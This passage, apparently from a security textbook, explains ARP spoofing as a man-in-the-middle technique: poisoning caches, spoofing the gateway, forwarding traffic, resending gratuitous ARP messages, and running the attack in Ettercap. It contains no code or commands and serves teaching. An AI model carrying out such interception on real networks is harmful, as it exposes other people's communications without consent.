my MAC address, I would get messages destined for you. By sending out an ARP
response indicating your IP address is at my MAC address, I put myself into the mid‐
dle of the communication flow.
This is only single-direction, though. If I end up spoofing your IP address with my
MAC address, I’m getting only messages that were supposed to go to you. To get the
other end of the conversation, I would need to spoof other addresses. You may, for
example, spoof the local gateway in order to capture messages to and from you and
the internet. This takes care of only getting the messages to me. I have to also get the
messages back out to the intended targets, or the communication just stops because
no one is getting messages they expect to get. This requires my system to forward the
initial message out to the intended target.
Since ARP caches do time out, if I don’t keep having my system sending these mes‐
sages, eventually the cache will time out and then I won’t get the messages I want any‐
more. This means that I need to keep sending out these messages, called gratuitous
ARP messages. A
gratuitous ARP message
is one that hasn’t been requested but
offered nonetheless. There are legitimate reasons for this behavior, but they aren’t
common.
While other tools can be used for this, we can use the program Ettercap. Ettercap has
two modes of functioning. The first is a curses-style interface, meaning it runs in a
console but isn’t strictly command line. It presents a character-based GUI. The other
one is a full Windows-based GUI.
Figure 2-8
shows Ettercap after our target hosts
have been selected and the ARP poisoning has been started. To start the spoofing
attack, I scanned for hosts to get all of the MAC addresses on the network. Then, I
selected the two targets and started the ARP spoofing attack.
